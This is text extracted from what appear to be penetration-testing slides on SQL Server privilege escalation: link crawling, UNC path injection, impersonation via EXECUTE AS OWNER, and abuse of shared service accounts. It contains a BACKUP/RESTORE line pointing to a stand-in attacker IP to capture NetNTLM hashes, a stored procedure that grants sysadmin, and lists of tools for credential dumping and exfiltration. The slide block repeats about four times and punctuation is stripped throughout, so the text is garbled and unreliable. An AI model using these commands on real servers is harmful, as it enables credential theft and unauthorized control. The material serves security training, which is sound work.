Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
